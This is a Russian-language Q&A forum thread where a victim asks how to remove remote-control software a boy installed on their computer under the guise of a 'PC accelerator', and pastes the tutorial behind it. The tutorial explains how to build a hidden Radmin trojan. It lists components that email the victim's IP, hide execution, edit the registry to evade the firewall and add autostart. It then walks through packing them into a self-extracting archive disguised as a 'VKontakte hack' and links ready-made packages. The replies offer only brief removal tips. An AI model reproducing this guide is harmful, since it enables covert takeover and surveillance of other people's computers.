люди помогите плиз(см,внут)

H1p Hop Ученик (120), закрыт 9 лет назад
короче тут один пацан мне заходит через какую то программку и управляет компом ;( он мне передал какой то файл сказал что ускоритель компа я надал и она установилась и он зашел комне на комп!!!!все что я знаю вот об это прогриммае:
плиз скажите мне как ее удалить прошу вас люди плииизз

troy Radmin (полный доступ к компьютеру и файлам через интернет)
Удалённое управление RADMIN

Сдесь я расскажу для новичков как можно зайти через радмина на компьютер юзера.
Это хак сборка всем известного ПО radmin!Плюсы этой сборки в том что:
1.не требует установки(жертве достаточно дважды счелкнуть по instal.bat или если вы сделали саморасп-ся архив то всего лишь запустить его)
2.совершенно скрыт(нет значка в трее и в диспечере задач только во вкладке процессы)
3. не требует денег
4. НЕ ПАЛЕТСЯ АНТИВИРЯМИ так как является radminom

ВСЕ ЧТО В АРХИВЕ!
blad.exe обеспечивает отсылку на вашу почту IP жертвы
cmdow.exe-скрывает выполнение бат файла(палиться антивирями как реклама,я лично не пользуюсь им)
svchost.exe- это и есть собстевенно наш радмин
admdll.dll-мозги svchost.exe(ОБЯЗАТЕЛЕН для работы)
raddrv.dll-обеспечивает передачу изображения монитора(не обязателен но без него плохо отображаются мелкие куски изображения)
blat.dll-мозги blat.exe
install.bat-запускает сервак троя,скрывает его,добовляет в автозагрузкусохраняет файлы в папку windows!(именно в него необходимо вписать свою почту)

Все файлы надо добавить в SFX архив и в свойствах указать выполнить после распаковки install.bat
далее при запуски архива...вы не увидите ничего)Это работа утилиты CMDow которая запускает cmd в скрытом режиме.
что же происходит в данный момент?
архив распаковывает файлы файлы для радмина копирует в windows, файлы почтовой утилиты в windows\system32\ , добавляет записи в реестре чтобы радминсервер не было видно,чтоб не ругался виндфаерволл, запускает радминсервер , и отдаёт команду на отсылку ip на ваш почтовый адрес.
после того,как программа выполнится,все распакованные файлы удаляются.

Как пользоваться?

В файле install.bat надо прописать адрес логин и пароль вашей почты,а так же строку с паролем от радмина (по умолчанию пароля нет, обязательно впишите иначе никакого IP вам на почту не придет).далее создаём самораспаковывающийся архив, и кидаем его жертве.
Чтобы не было так паливно,можно прописать в install.bat удаление самого архива,установщик которой вы добавите в архив,например "Взлом_Вконтакте.exe"
Дописывайте,корректируйте под свои нужды,я лишь выкладываю основу,далее всё зависит от вашей фантазии.

В общем суть такова(для особо одаренных:0) - Создав архив SFX по инструкции, скидываети его любым доступным способом, и как только жертва щелкнит по нему раза, вам на почту (прописанную в install.bat) придет её IP и откроется доступ для вас. После чего вы вставляете полученный IP в RADMIN VIEW и жмете подключится. И все вы полностью управляете или наблюдаете за компьютером жертвы. Сам много раз так делал, все работает.

Вот Radmin View(через который подключаетись к жертве) rview34ru.exe на files.gw.kz
Вот готовый SFX архив, вам только надо открыть через winrar и прописать свою почту в install.bat patch.exe на files.gw.kz
Вот все файлы нужные для SFX архива troy rAdmin.rar на files.gw.kz
Лучший ответ
BreezeR Ученик (243) 13 лет назад
где то слышал название этой проги.. .
вродь в систем32 папку идут длл-ки этой проги, через них доступ к вашему компу идёт. .
точно не знаю.
Остальные ответы
Ольга Ц. Гуру (4921) 13 лет назад
восстановление системы поможет и установка нормального файрвола
Источник: Прям кул хацкер блин-( Аутпост, каспер, и прямые руки - и все будет облом!
sm Просветленный (32514) 13 лет назад
> он ..сказал ..я надал

Лошара)